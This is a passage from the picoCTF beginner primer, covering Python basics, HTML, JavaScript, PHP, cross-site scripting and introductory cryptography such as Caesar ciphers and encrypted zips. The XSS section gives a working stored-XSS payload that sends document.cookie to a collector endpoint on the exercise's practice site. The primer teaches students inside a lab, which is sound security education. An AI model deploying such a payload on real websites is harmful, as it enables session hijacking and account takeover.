loop. The first message is inside the first if-clause, that is only fulfilled when 'i' is less than 5. The second message is inside the second if-clause, which is only fulfilled when the 'i' is greater than or equal to 5. At last, we print the variable 'i', which is not inside any if-clause, so it is always printed. Another way to implement this program, is using an 'else': ``` for i in range(10): if i < 5: print("The following number is less than 5") else: print("The following number is greater than or equal to 5") print(i) ``` When then condition in an if-clause is not met, it enters the 'else' to execute what is inside. You should still see this output when you run the program: ``` $ python3 helloworld.py The following number is less than 5 0 The following number is less than 5 1 The following number is less than 5 2 The following number is less than 5 3 The following number is less than 5 4 The following number is greater than or equal to 5 5 The following number is greater than or equal to 5 6 The following number is greater than or equal to 5 7 The following number is greater than or equal to 5 8 The following number is greater than or equal to 5 9 ``` To practice, implement a program that prints a range of 100 numbers and prints a different message when the numbers are smaller than 10, another message when the numbers are between 10 and 50, and another message when the numbers are greater than 50. ### 4.1. Lists There are several data structures in python, which are simply structures to organize data in a certain manner. Different data structures have different properties. We are going to introduce one that is called a 'list', which allows us to store several values, one after the other. We create a list like this: ``` my_list = ["I", "Love", "picoCTF"] print(my_list) ``` We can iterate in the list to operate on each item in any way we want. For example, suppose we want to print each item of the list, we could do this: ``` my_list = ["I", "Love", "picoCTF"] print(len(my_list)) print(my_list) for i in my_list: print(i) ``` When you run that program, you should see the following output: ``` 3 ['I', 'Love', 'picoCTF'] I Love picoCTF ``` Note that the number 3 printed is the length of the list. You can sort the list alphabetically by calling a function that is part of the list like this: ``` my_list = ["this", "is", "not", "ordered", "alphabetically"] my_ordered_list = my_list.sort() for i in my_list: print(i) ``` You should see this output when you run that program: ``` alphabetically is not ordered this ``` Now, create a list of numbers, and print it backwards! Using google, it should be very easy to find how to do it. ### 4.2. Functions If you have a piece of code that you want to use often, copy pasting that piece of code is a bad idea because your code gets longer and for a human becomes harder to read. On the other hand, if you want to make a modification in that piece of code, you will have to modify every part in which you copy and pasted that code. We can overcome that by using functions. A function can receive parameters, which are variables you pass to the function so operations with them can be done. Additionally, a function can return a value, which is the result after all the operations are done. Let’s see an example of a function that verifies if a number is even or odd. If it is even, it will return True. If it is odd, it will return False. The program receives any number you input and verifies such an input. Note that the '%' operator in the code is the modulo operator, which calculates the remainder. In this case we calculate the remainder of x divided by 2 and compare that to zero to determine if the number is even or odd. Read the code to understand! ``` def even_odd(x): if (x % 2 == 0): return True else: return False print("Input a number:") my_number = int(input()) if even_odd(my_number): print("The number is even") else: print("The number is odd") ``` Run that program and try several numbers! ### 4.3. Input and output A program might need to have interactions with a user. For example, a calculator expects that the user enters some numbers to then do the processing. Receiving user input in a terminal is very easy in python because it has predefined functions that do it for us. The function ‘input()’ waits until the user writes something in the terminal and presses enter. Note that a function can have zero parameters. Then, the function returns the string that the user wrote, and we assign it to the variable number_iterations’. Here is an example, in which we allow the user to control the number of iterations of our program: ``` print("Input the number of iterations:") number_iterations = int(input()) for i in range(number_iterations): if i < 5: print("The following number is less than 5") else: print("The following number is greater than or equal to 5") print(i) ``` Run that program. When you run it, it will do nothing until you input a number in the terminal and press enter. In other cases, the data we want to input does not have to come from the user. It could come from a file. We can read all the lines from a file using the function 'open'. Create a file called “pico.txt” in the same folder that you are creating the python programs. Then, in that file copy and paste this text: ``` The Cosmos is all that is or was or ever will be. Our feeblest contemplations of the Cosmos stir us -- there is a tingling in the spine, a catch in the voice, a faint sensation, as if a distant memory, of falling from a great height. We know we are approaching the greatest of mysteries. ``` Save the file. Now, in the same folder, create a program with the following code: ``` filepath = "pico.txt" i = 1 with open(filepath, "r") as my_file: for line in my_file: print(i) print(line) i += 1 ``` You should see the following output when you run the program: ``` 1 The Cosmos is all that is or was or ever will be. 2 Our feeblest contemplations of the Cosmos stir us 3 -- there is a tingling in the spine, 4 a catch in the voice, 5 a faint sensation, 6 as if a distant memory, 7 of falling from a great height. 8 We know we are approaching the greatest of mysteries. ``` As you saw, this program reads a file and enumerates each line in the output. The 'open' function has two parameters, the first one is the path of the file you want to open, and the second has a string with the letter 'r', which means that we want to **r**ead the file. 'my_file' is just the name of the file we want to read. Then, we can iterate over each of the lines of the file in a for loop. Note that this is all made inside a 'with' block. We use the 'with' statement before opening a file to close the file automatically after reading. Also, to handle possible exceptions during the execution. What that means is that when you open a file, you must close it and make sure that it closes correctly. For example, if you do my_file.close(), that would close the file. Imagine that along the way before calling close, something happens and you never get to the line in which you close the file, so you left it open accidentally. Later we will give you more details on exceptions. For the time being, just think of 'with' as an easy way to ensure that the file will be closed correctly. If you want to save your output in another file, you can easily do it in the following manner: ``` filepath_read = "pico.txt" filepath_write = "outputpico.txt" i = 1 with open(filepath_read, "r") as file_read: with open(filepath_write, "w") as file_write: for line in file_read: file_write.write(str(i) + "\n") file_write.write(line + "\n") i += 1 print("look inside your folder...") ``` We introduced some new concepts in this code. This: `str(i)` Is a cast from an integer to string. We want to convert that integer into a string to be able to concatenate two strings. For example, if we have the string "hello" and the integer 123, and we want to create a string that is "hello123", we can concatenate those two values. But first, we need to convert the integer to string, otherwise python will show an error. To concatenate strings, we use the operator '+'. When we add two strings, python will concatenate them. When we add two integers, python will do a mathematical addition. To represent a break of line in a string, we use "\n". After this explanation, you should know that this: `str(i) + "\n"` Simply converts an integer to string, and then we concatenate a break line to it. We do that, because the function line write() does not add a breakline to the string after it writes it, so we would have a file with a single huge line of text if we don’t do that. When you run the code, you should see no output in the terminal, but if you show the contents of the folder you are in, you should see a new file called 'outputpico.txt'. If you show the contents of that file, you should see the following: ``` $ cat outputpico.txt 1 The Cosmos is all that is or was or ever will be. 2 Our feeblest contemplations of the Cosmos stir us 3 -- there is a tingling in the spine, 4 a catch in the voice, 5 a faint sensation, 6 as if a distant memory, 7 of falling from a great height. 8 We know we are approaching the greatest of mysteries. ``` We just learned how to read and create files! ### 4.4. Comments It is a good practice to explain what your code is doing in a comment. In that way, the reader of the code, which may be yourself, will understand what some part of the code is doing. You will realize that when you write some code, you will forget the exact logic and you will have to read it again to understand what you did. In summary, comments are something very important in programming. In python, you write a comment by adding the '#' symbol at the beginning of any line of your code. This line, will be ignored by the python interpreter as it did not exist, so it does nothing in the program. See the following example: ``` print("Input the number of iterations") # We read user input and assign it to the variable number_iterations number_iterations = int(input()) # We iterate according to the value input by the user for i in range(number_iterations): if i < 5: # We only print this message when the value of i is less than 5 print("The following number is less than 5") else: # We only print the value of i is greater than or equal to 5 print("The following number is greater than or equal to 5") # We always print this print(i) ``` ### 4.5. Try-except and exceptions Exceptions are useful in hacking in several cases, for example, when you want an attack to keep executing even if an unknown error occurred. When a program tries to execute an instruction that even though it has a correct syntax, it cannot be done for some other reason, an exception is thrown. For example, if you try to divide a number by zero, that can have the correct syntax to do it, but when the program is executing the line it will stop and fail. Let’s do the experiment: ``` num1 = 8 print("Input the number that will divide:") num2 = int(input()) result = num1 / num2 print(result) print("The program keeps executing to do other stuff...") ``` As you can see the program divides 8 by any number input by the user. If you run it and input for example 2, nothing bad will happen, and you will see this: ``` Input the number that will divide: 2 4 The program keeps executing to do other stuff... ``` Now, run the program again and input 0, you will see this: ``` Input the number that will divide: 0 Traceback (most recent call last): File "helloworld.py", line 4, in <module> result = num1 / num2 ZeroDivisionError: integer division or modulo by zero ``` An error ocurred because you cannot divide by zero. That is a rule of python and most programming languages. Your program will stop when an error happens, further lines will not be executed. In this case, you could verify that the number is not zero in an if-clause. For this example, let’s fix the program instead using a try-except: ``` num1 = 8 print("Input the number that will divide:") num2 = int(input()) try: result = num1 / num2 print(result) except: print("An error has occurred, did you try to divide by zero?") print("The program keeps executing to do other stuff...") ``` In our previous code, you would print the same message for any error. Try to input a string instead of 0. It will show the same message. If you want to be more specific, you can catch specific errors in the following manner: ``` num1 = 8 print("Input the number that will divide:") try: num2 = int(input()) result = num1 / num2 print(result) except ZeroDivisionError: print("Do not divide by zero, that is forbidden.") except ValueError: print("Your input value must be an integer.") print("The program keeps executing to do other stuff...") ``` Now when you input a string, it will show this: ``` Input the number that will divide: "Any string" Your input value must be an integer. The program keeps executing to do other stuff... ``` And if you input zero it will show this: ``` Input the number that will divide: 0 Do not divide by zero, that is forbidden. The program keeps executing to do other stuff... ``` Note that when an error occurs, the following lines inside the 'try' block will not execute. See that 'result' is not printed, and that makes sense because there was no result to print. The program jumps into the ‘except’ block immediately. ### 4.6. Pass arguments to a python program When you call a program from the command line, it is possible to pass arguments in the same way you do with several programs in the terminal. The following program shows how to do this: ``` import sys print('Number of arguments:', len(sys.argv), 'arguments.') print('Argument List:', str(sys.argv)) # The number of iterations is taken from the second argument. # (Remember that in an array [0] is the first one, [1] is the second one.) number_iterations = sys.argv[1] f = open("output2.txt", "w") for i in range(int(number_iterations)): if i < 5: f.write("The following number is less than 5\n") else: f.write("The following number is greater than or equal to 5\n") f.write(str(i)+"\n") f.close() print("look inside your folder...") ``` Put this code into a file called "args.py". If you run it without any arguments, it will throw an error: ``` $ python3 args.py Number of arguments: 1 arguments. Argument List: ['args.py'] Traceback (most recent call last): File "args.py", line 8, in <module> number_iterations = sys.argv[1] IndexError: list index out of range ``` This error happened because the program is expecting an argument on the command line, but none is given. More specifically, the second argument in the argument list is queried `sys.argv[1]` but it doesn’t exist! Do take note, however, that even without supplying any arguments to the program, the program name is considered the first argument. To run this program properly, we must include an integer argument to our program call: ``` $ python3 args.py 6 Number of arguments: 2 arguments. Argument List: ['args.py', '6'] look inside your folder... $ cat output2.txt The following number is less than 5 0 The following number is less than 5 1 The following number is less than 5 2 The following number is less than 5 3 The following number is less than 5 4 The following number is greater than or equal to 5 5 ``` Take note that since we did not use `with` to open our file, we had to close it manually with the line: `f.close()` ### 4.7. ASCII ASCII is a way in which a computer represents characters. We could say that in memory a computer only stores numbers, but a program can interpret those numbers in a certain way to understand them as characters. In the following table, it is shown what number corresponds to each character in ASCII: The ASCII includes all the characters that are used in the English language. For other languages, there is a bigger character set called Unicode. For example, in the ASCII table, you can see that the @ symbol is represented as the 64 number in decimal. The table also has a column called Hx or Hexadecimal, which is base 16. Decimal is base 10. The decimal base is the one we use in everyday life, which likely comes from the fact that humans have 10 fingers. Therefore, we have 10 different symbols to represent all different numbers. In computers, it is helpful to have a base with 16 symbols because it translates easier to binary. You probably know that most computers physically store only binary numbers, which are represented only by 0 and 1. A **b**inary dig**it** is called a bit. Although computers use binary, base 16 is easy to translate from binary for us humans. The hexadecimal base (or base 16) has the following symbols: `0 1 2 3 4 5 6 7 8 9 a b c d e f` The binary base (or base 2) has these symbols: `0 1` The decimal base (or base 10), has the following symbols: `0 1 2 3 4 5 6 7 8 9` Let’s see in python how can we use the hexadecimal representation to print characters. In a python string, you can put “\x” which is a special sequence to tell python that the following two characters are a hexadecimal number: ``` print("picoCTF") print("\x70\x69\x63\x6f\x43\x54\x46") ``` When you run that program you should see: ``` picoCTF picoCTF ``` Check the table to see that the characters match! As a challenge, print the string “I_LOVE_PICOCTF” only using hexadecimal. Note that uppercase letters are represented by a different hexadecimal number than lowercase letters. ### 4.8. Pwntools For binary exploitation, there is a very useful library called pwntools: Keep this library in mind as an important part of python for exploitation. You do not need to learn anything right now. We will teach how to use it in binary exploitation. ### 4.9. Http requests in python Below is an example of how you can request a web page in python. Here we are requesting the HTML of the picoCTF website. Right now, maybe you do not know HTML and worry this will not make much sense to you. After you are done with the Web section, come back here and try this example: ``` import http.client conn = http.client.HTTPSConnection("picoctf.org") conn.request("GET", "/") r1 = conn.getresponse() print(r1.status, r1.reason) # 200 OK data1 = r1.read() conn.request("GET", "/a") r2 = conn.getresponse() print(r2.status, r2.reason) # 404 Not Found data2 = r2.read() conn.close() ``` ## 5. Web Exploits ##### Samuel Sabogal Pardo Web exploits are a nice starting point to dive into the world of hacking. Chances are that you are familiar with a web browser, so you will feel you are working on something that you already know! ### 5.1. Html Before diving into Web Exploits, you need to understand how a website works. Many years ago, the web was used to visit static pages that did not have interactive features; they just showed information. To do a static page, it is enough to write some lines of HTML. What is HTML? First, it is not a programming language. Html means HyperText Markup Language, and we use it to determine the font size, colors, margins, or similar features in a web page. When an html file is accessed in a browser like Firefox, Chrome or whichever browser you like, the browser presents the text according to the html on it. Your browser can access an html file locally. Locally means that the file could be in your laptop or file system. In contrast, it could access the file remotely through the Internet. Let’s see an example of creating a simple html and access it locally: - On your computer, create a folder called "picoexample" and then, inside that folder, create a text file and name it "myFirstPage.html". You can do this on Notepad on Windows, Textedit on Mac, or any text editor from Linux. It is important that the extension is ".html". It cannot be ".html.txt" or something that is not exactly ".html". If you don’t see the extension in your operating system, this is a good opportunity to google how to make it appear to be able to modify it. Remember, for obstacles that might appear along the way, google is the answer. - Edit the content in a text editor and write: Hello World! - Save the file - Open the file in any browser. To do that, you can right click on the file, and then select "open with" and choose the browser you want. You should see a page like the following: - Now, in the text editor, modify the content of the file and replace the text by: <b>Hello World!</b> - Save the file on the text editor. Then, open the file in the browser again, or you can simply click refresh on your browser. Since it already has opened the file, you will see the message in bold, similar to this: You just created a page with a very simple HTML that made your message appear in bold. Note that <b> is the opening tag, </b> is the closing tag. Analyze the difference between the opening and closing tag. What do you see? The closing tag is usually the same as the opening tag, but you include "/" like we just did. We just used an html tag to tell the browser we want some specific text in bold. Html is just a bunch of tags that allow us to do similar things. Now let’s make a page with more fields so you can get a sense of tags and the structure of a bigger page. Use the following HTML code to replace the content of the file you are editing: ``` <html> <head> <title>This is a picoCTF html Example</title> </head> <body> <h1>This is a Heading</h1> <h2>This is a smaller Heading</h2> <p>This is a paragraph.</p> The following is an image:<br> <img src="picologo.png" /> </body> </html> ``` As you did before, save the file in the text editor and click refresh on the browser. You probably see something like this: If you read the html code and try to analyze its content, you will realize the following: - The title shown in that tab of the browser "This is a picoCTF html Example", appears there because you put that text inside in the <title></title> tags. - <h1> Is used to create a big heading - <h2> creates a heading smaller than <h1> - The <head> tags are used to group introductory content, in this case the title, but if you remove this tag, you will not see much change in our page. Do the experiment of removing it. If you only remove the opening or closing tag it will cause an html error, so make sure to delete the opening tag and closing tag. - The <body> tags are used to group the main content of the page. If you remove them you will not see much change in our page because we have just a few things. However, in several cases you might break a page completely if you remove a tag without proper care. You may have noted the <img> tag is not showing any image as it should. Why? Let’s analyze the element img: `<img src="picologo.png" />` First you see there is not opening or closing tag, there is just one tag with the slash at the right-hand side. This is ok for an image. As you can see, it has an **attribute** called "src", which means source. We are assigning to "src" the value "picologo.png". Our html is going to try to access a file called "picologo.png" in the same folder where "myFirstPage.html" is contained, which is the folder we name at first "picoexample". There is no image called "picologo.png", so the browser has nothing to show. Copy and paste an image to the folder and name it "picologo.png". The extension of the image has to be ".png". If you have an image with a different extension, you can just use the extension you need in the "src" attribute in your html. For example, if the extension of the image you have is ".jpg" you can simply replace `<img src="picologo.png" />` with `<img src="picologo.jpg" />` If you successfully created the image in the folder, and refresh the browser you will see the following, of course, with your own custom image: A fundamental part of web sites are the links. The link tag is **<a>**, the following is an example of a link directed to google: `<a href="http://google.com" > Go to google! </a>` Use that element and put it in your code to make a link to the web site you want. Now practice by adding more html tags and images in your page! This is a reference in which you can find more html tags: ### 5.2. JavaScript To make pages more interactive JavaScript is commonly used. JavaScript is a programming language! We can do algorithms using it. JavaScript is executed in your browser. For example, when you visit a website, the JavaScript code is downloaded along the HTML and it only executes once it is loaded in your browser. When you visit a page, you are downloading an html file and your browser interprets the tags and prints the text and images as we learned before. This image illustrates that process: If that file happens to contain JavaScript, your browser will execute it. Let’s look at an example. In the same folder "picoexample", create a file called "myFirstJS.html" using a text editor. Then, put the following content in the file: ``` <html> <head> <title>This is a picoCTF JS Example</title> <script> alert("Hello picoCTF"); </script> </head> <body> <h1>JavaScript example</h1>> </body> </html> ``` Save the file. As soon as you open the page, you will see an alert showing "Hello picoCTF", something like this: If you analyze the file, you will note that the magic is happening in this element: ``` <script> alert("Hello picoCTF"); </script> ``` Whatever you put inside the tags "<script> </script>" will be tried to execute by the browser as JavaScript. Since JavaScript is a programming language, we should be able to do some arithmetic. Replace the string "Hello picoCTF" by an arithmetic operation, like 8*8, like this: ``` <script> alert(8*8); </script> ``` Note that we only use quotes when we want to use a string. In arithmetic operations we don’t use quotes. Save the file and refresh the browser. You should see the following: Click Ok in the alert message to make it go away. Anything you write in JavaScript or html will be visible for any user that accesses your page in a browser. To see the html and JavaScript code in your browser right click the page and then "View Page Source" You will see the JavaScript code you just wrote: This is a very important thing! Never put a secret in your JavaScript code or html. If someone does it, that will be a vulnerability in your page. As a hacker you can try to look for secrets on the html of a page you want to exploit. Now let’s use some more elaborated code. We are going to make a page that adds two numbers input by the user and shows the result in an alert. We will explain its code in detail later. The code is the following: ``` <html> <head> <title>This is a picoCTF JS Example</title> <script> function myFunctionSum(){ var number1 = document.getElementById("number1").value; var number2 = document.getElementById("number2").value; var result = Number(number1) + Number(number2); alert(result); } </script> </head> <body> <h1>JavaScript example to add2 numbers</h1> Input the first number<br> <input type="text" id="number1" ><br> Input the second number<br> <input type="text" id="number2" ><br> <button onclick="myFunctionSum()"> Show alert! </button> </body> </html> ``` Put it on a text file, save it, and open it on a browser as usual. You should see this: If you put the numbers in each text field, and click "show alert!", you will see the alert with the result. For this example let’s input 4 and 2 in the text fields, you should see: Now that you know what the page does, let’s analyze the new lines of the code. In this line we have an input tag: `<input type="text" id="number1" ><br>` As you can see, it is of type text, and it has an "id" with the value of "number1". The value of the "id", in this case "number1", is something we arbitrarily define to be able to access the content of this text input in JavaScript. This line: `<button onclick="myFunctionSum()"> Show alert! </button>` Is responsible for calling the function "myFunctionSum()" when the button is clicked. A function is just a piece of code that we can define, so whenever is called it executes the code inside. In this case, we named the function "myFunctionSum", but is is possible to give it any name. The function has to be defined inside the script tags. Try to read the function and understand at a general level what each line is doing: ``` function myFunctionSum(){ var number1 = document.getElementById("number1").value; var number2 = document.getElementById("number2").value; var result = Number(number1) + Number(number2); alert(result); } ``` Perhaps a confusing part is the following line: ` var result = Number(number1) + Number(number2);` When the variables are defined, both number1 and number2 are textual not numerical. This line turns them into numbers before adding them together. Why don’t you experiment and see what happens when these variables aren’t converted to numbers? Challenge! Modify the file to multiply the two numbers. When you are done with that, include a new third input number to multiply three different numbers! At this point you should be able to do it on your own. Be careful with the syntax, remember that a single character wrong might break the whole code. ### 5.3. Server code As we said previously, JavaScript is executed only in the browser. What if you want to do calculations and store data in the remote server? For example, when you login into a Website, your user and password has to be verified on the server. The password is stored in the server and should not travel outside of it for the sake of security. If you would verify a password on JavaScript, you would be able to see it on your browser in the same way you can see any JavaScript, and that would be very insecure. There are several programming languages that can be executed on the server, for instance: - Python - Java - PHP - C - C Sharp - And many more… For our examples, we will begin using PHP, not because we think is a great language, but because a huge number of websites on the Internet use it and it is very easy to learn and deploy. In any case, as a hacker, you would generally have to learn all the languages you can because different websites are made on different languages, as well as CTF challenges that try to simulate real life! The more a language is used, the more likely you will have to attack a website made with it. However, the vulnerabilities we will be explaining can happen in any programming language, because they are not a fault of the language, but a fault of the programmer that did the website. Suppose you have a text file named hello.php, containing: ``` <b>Hello World!</b> <script> alert('Hello World from JavaScript!'); </script> <?php echo "Hello World from PHP!"; ?> ``` Note that in a file with the extension .php you can mix html, JavaScript, and PHP code! If the server supports PHP, everything inside **<?php ?>** will be understood as PHP code and run by the server, not by the browser. Look at the following image carefully to understand what happens: If you open a file with that content on your laptop, the PHP code will not be executed, because your laptop is not a PHP server (if you have not made it one). So, to execute PHP you need to make your laptop a server. But for the time being, we can use the following: Access that link, and you will see at the right a file with html and PHP code, that when is run, prints "My first PHP script!". Let’s modify the code to additionally print the date, so below the line `echo "My first PHP script!";` Add the line `echo date("H:i:s");` According to what you have learned so far, that time is from the clock on your computer? Or the time of the clock in the server? …PHP is server side code, so that time is from the clock on the server! Now let’s make an experiment, and add another line with this php code: `echo "<script> alert('Hello World from JavaScript!'); </script>";` That string echoed in PHP has JavaScript code. Is the JavaScript alert shown? What happened? As expected, anything printed on php, will become an integral part of the html downloaded file, so the JavaScript will be executed. This opens the door for the famous attack of Cross Site Scripting (XSS). ### 5.4. Cross Site Scripting (XSS) After you Login into a Website, the website needs a way to know that any request coming from your browser is coming from a user that previously logged in, without the need to send the user-password again. To do that, the website can send to your browser a secret random value after login. That value is generally stored in a cookie or in JavaScript local storage. For this example, let’s pretend it is stored in a cookie, which is simply a variable in your browser that can retain data. If a Website sets a specific cookie in your browser, your browser automatically re-sends that cookie in each request to the website. If a website only uses cookies to retain a session, and if a hacker can steal the authentication cookie from you, they could pretend to be you! Note that only using cookies for authentication will open the possibility of Cross Site Request Forgery (CSRF), but this will be explained later, for now let’s focus on XSS. Suppose you are a hacker in a social network. When you create your account, instead of using your name, you input JavaScript code. When a friend of yours visit your profile, the WebSite will try to print your name, but your name is actually JavaScript code, so the browser might execute that JavaScript code. In that way, you could execute your own JavaScript on your friend’s browser! When you get to execute JavaScript in someone else’s browser, you can read their authentication data, which can be a secret value placed on a cookie or JavaScript local storage after a user logs in. At that point, your friend’s account would probably be compromised! An important skill to have, is to use the browser debugger. For this explanation we will use Firefox. You can download and install Firefox here: Note: If you really don’t want to use Firefox, every browser has a debugger that you can google how to use it. It will not be that different. Using Firefox, input your name and some text in the description in the following link: Open another tab and visit the following link. You should see your name and description: Now, in the Firefox Menu, click "Web Developer" and then click "Debugger". You should see a pane like the following: In that pane, click "storage". At the left click "cookies" and click the domain you are currently on. You will see a cookie that has your name in the value! You can only see your cookie. Other users would see their cookie with their name. For this experiment, you will steal your own cookie. But with the same method, you could steal the cookie of someone else. For now, access this link again: Create a new user that has your name, but instead of the description has the following code: `<script> alert('I just injected Javascript!'); </script>` If you navigate this link again, you will see your JavaScript code triggered: Like this: You just verified that you can inject JavaScript in the website. Now we are going to inject JavaScript that will steal the cookie. Create another user in the same link for creating users: But now, put this JavaScript code in the description: ``` <script src="https://code.jquery.com/jquery-3.4.1.min.js"> </script> <script> $.get( "https://primer.picoctf.org/vuln/web/insert.php", {cookie : document.cookie, hackername : 'YourName'}, function(data) { alert("I just stole the cookie!"); } ); </script> ``` Let’s understand the code. The first line, imports a library called jquery: `<script src="https://code.jquery.com/jquery-3.4.1.min.js"> </script>` A library is a set of functions that allow us to do some actions in an easier manner. In this case, it allow us to do requests and send data from JavaScript to a server. We are just sending the cookie to a remote service that is made to receive cookies from this exercise. That service receives two variables: "cookie" and "hackername". The value of the variable cookie will be "document.cookie". Here, instead of "=", we use ":" to assign a value to a variable. Using document.cookie you access the cookies from JavaScript, so that should contain the cookie you want to steal. The variable hackername simply has a name assigned. You could replace the string "YourName" with your actual name. Remember that a string must be inside quotes in JavaScript. The function: ``` function(data){ alert("I just stole the cookie!"); } ``` Is simply a function that will be executed after the request is sent to the service, and will alert a message. Now visit this site again: When a user visits that site is when the JavaScript is executed and the cookie is stolen. You should see the message: If you injected scripts previously, all those scripts are stored in the web site and will be executed in the order you injected them when the page that prints them is visited. Now you should be able to see the cookie you stole here: At this point you should have some understanding on how a website works. You are ready to begin to do more web challenges on the picoCTF! ## 6. Cryptography ##### Samuel Sabogal Pardo Cryptography is an ancient field that dates to Ancient Rome. Etymologically, the word traces back to the Greek roots "kryptos" meaning "hidden" and "graphein" meaning "to write." It is used to communicate secretly in the presence of an enemy. With cryptography we can achieve the following properties when a message is sent: - Confidentiality: No one unintended will be able to read the message. - Integrity: If a message is tampered, it is possible to detect that it was. - Authentication: The identity of a person can be verified accurately. - Nonrepudiation: If a person sent a specific message, then the person cannot deny that the message was sent by them. First, we will see how to achieve Confidentiality. This is done with encryption. When we want to hide a message, we say that we encrypt the message. To understand how encryption works, we will see an example of an ancient way of encrypting a message that is not secure by any means today, but it is good for illustration. But first, to practice our terminal skills, we will encrypt a folder in linux to prevent anyone from reading its contents without the appropriate password. ### 6.1. Practical example To use cryptography in real life, you should never use your own implementations. To begin, we will demonstrate how to encrypt a file, without any knowledge in cryptography. Go to the picoCTF webshell at: When you are there, create a file called 'my_name.txt' containing your name. You could use the 'nano' editor, but in linux it is possible to do the following trick: If your name was 'samuel', you would run the following command to create the text file: `echo "samuel" > my_name.txt` The 'echo' command simply outputs a string, and we are redirecting that output to a file. For example, if we just run `echo "samuel"` You will simple see 'samuel' printed on the screen. Now run: `ls` and you will see the file you created: ``` ls my_name.txt ``` If you run the command: `cat my_name.txt` you will see the content: ``` cat my_name.txt samuel ``` Now, create another file with your last name called 'my_lastname.txt'. You can use the same technique to create 'my_lastname.txt': `echo "pardo" > my_lastname.txt` We will move both files to a new folder, then compress that folder, and then encrypt it! Compressing a folder just makes several files or folders to appear as a single file, and they would take less space on disk, but compressing does not provide any security. Anyone would be able to simply decompress it and see the original content. However, encryption will prevent obtaining the original content without the key. To do that experiment, create a directory called my info: `mkdir my_info` And move both files inside using the command mv (mv means move): ``` mv my_name.txt my_info/ mv my_lastname.txt my_info/ ``` Navigate to the folder 'my_info' and make sure that it contains the files. Now, come back outside my_info folder, and compress the folder into a zip file by running: `zip -r my_info.zip my_info/` Note that my_info.zip is the name we chose for our compressed file, and '-r' means recursively, which in this case means that we want to compress everything inside the folder. If you run `ls` You should see the folder and the compressed file: ``` ls my_info my_info.zip ``` Now remove the folder by running: `rm -r my_info` 'rm' means remove, and '-r' means recursively and indicates we want to remove everything in the folder: `rm -r my_info` Now, if you run `ls` you should see only your compressed file: ``` ls my_info.zip ``` You could easily uncompress the folder by running: `unzip my_info.zip` And obtain the original folder: ``` ls my_info my_info.zip ``` Now, let’s create a zip file protected with encryption, so it cannot be uncompressed without a key. In this context, the words 'key' and 'password' are synonyms. Let’s first remove the .zip file we already created by running: `rm my_info.zip` Now, let’s create our encrypted zip, by using a password, with the following command: `zip --encrypt -r my_protected_info.zip my_info/` You will be asked to input a password and verify it, so remember the password you use to be able to decrypt it later: ``` zip --encrypt -r my_protected_info.zip my_info/ Enter password: Verify password: adding: my_info/ (stored 0%) adding: my_info/my_name.txt (stored 0%) adding: my_info/my_lastname.txt (stored 0%) ``` If you run: `unzip my_protected_info.zip` It will ask for the password, and only if you input the correct password, you will get back the original content! ``` Archive: my_protected_info.zip creating: my_info/ [my_protected_info.zip] my_info/my_name.txt password: extracting: my_info/my_name.txt extracting: my_info/my_lastname.txt ``` It is not possible to obtain the original content without the password because it is used to do operations with the content to obtain the resulting encrypted file. At this point you might have no idea of what happened. There are many algorithms for encryption, that were created since the antique Rome. Old ways of encrypting data are easily broken nowadays. Even relatively new ways of encrypting data are broken easily today. Some of them are considered unbreakable right now, but will be broken in the future. Let’s begin to understand how encryption works! ### 6.2. Substitution ciphers "Cipher" means a secret or disguised way of writing a message. It can be thought as the same as encryption. One cipher method invented in the antique Rome and named after the emperor Julius Caesar who used it for his private communication is Caesar’s cipher. This cipher simply substitutes each of the letters of a word by another one that is a certain number of positions further in the alphabet. That "certain number of positions" is called the shift. For example, if we have the word "hello" and we want to encrypt it using Caesar’s cipher with a shift of 3, we would replace the 'h' by 'k' because 'k' is 3 positions further in the alphabet, the 'e' by 'h' for the same reason, and so on. We called the original text we want to encrypt the cleartext or plaintext. The result of encrypting 'hello' using Caesar’s with a shift of 3, is the following: cleartext → h e l l o Encrypted text → k h o o r "Decrypting" means obtaining the clear text from the encrypted text. For Caesar’s cipher we simply do the same but in reverse; we subtract 3 positions in the alphabet to each letter. Note that when we get to the end of the alphabet after adding positions while encrypting something, we simply overlap the alphabet. For example, to encrypt the letter 'z', we would encrypt it using the letter 'c'. To make sure you understand the decryption, decrypt the following text using Caesar cipher with a shift of 3: s l f r f w i The result is something you probably know. Hint: the first decrypted letter is 'p' . Caesar’s cipher is a **substitution cipher**, because it replaces each letter by something else. In a substitution cipher, you don’t necessarily need to replace a letter by another letter. You can use any symbol if you know how to reverse it. To practice, go to the webshell. Once you are there, create a python script using: `nano caesar.py` We will use a python code that encrypts and decrypts only lowercase letters using Caesar cipher. This is how it looks: ``` def caesar_encrypt(text): result = "" # Go through each character of the text in this for loop for i in range(len(text)): # Obtain the ASCII value using ord char_position = ord(text[i]) # Substract 97 to have a character from 1 to 26 char_position = char_position - 97 # Add 3 to the position, as caesar does new_char_position = char_position + 3 # Make sure that the position does not surpass 26 (we wrap around) new_char_position = new_char_position % 26 # Convert back to ASCII values new_char_position = new_char_position + 97 # Convert ASCII value to character and concatenate it to final result result = result + chr(new_char_position) print(result) return result def caesar_decrypt(cipher_text): result = "" # Go through each character of the text in this for loop for i in range(len(cipher_text)): # Obtain the ASCII value using ord char_position = ord(cipher_text[i]) # Substract 97 to have a character from 1 to 26 char_position = char_position - 97 # Substract 3 to the position, to get back original position new_char_position = char_position - 3 # Make sure that the position does not surpass 26 (we wrap around) new_char_position = new_char_position % 26 # Convert back to ASCII values new_char_position = new_char_position + 97 # Convert ASCII value to character and concatenate it to final result result = result + chr(new_char_position) print(result) return result text = "picoctf" print(f"Plain Text: {text}") cipher_text = caesar_encrypt(text) print(f"Encrypted: {cipher_text}") print(f"Decrypted: {caesar_decrypt(cipher_text)}") ``` Copy and paste the code into the file, save the file by pressing control+x, press enter, and then execute it with: `python3 caesar.py` You should see the following output: ``` Plain Text: picoctf s sl slf slfr slfrf slfrfw slfrfwi Encrypted: slfrfwi p pi pic pico picoc picoct picoctf Decrypted: picoctf ``` Read the comments in the python source code to understand it. You probably noted the '%', which is called the modulo operator. That allows us to wrap around a number, because it calculates the remainder of the division. We will see more detail of this in the future, so do not worry too much about it for now. But, know that if we want a number to start from 0 again if it surpasses certain threshold, we can use modulo operator. In this case, we use it because we only have 26 letters in the english alphabet. So, the first position is 0, which contains 'a', because arrays start at zero. The last position is 25, which contains 'z'. So, if we want to encrypt 'z', we would need to add 3 positions, and 25+3 is 28, but after 25 we need to begin from 0 again because of the way that caesar works. Modulo operator works perfect for that because: 26%26 is 0 27%26 is 1 28%26 is 2 So, as we said before in an example, the letter 'z' would be encrypted with 'c', which is in the position 2 considering that arrays start at 0. Other thing that you maybe did not understand at once from the code, was that we subtracted 97 from the 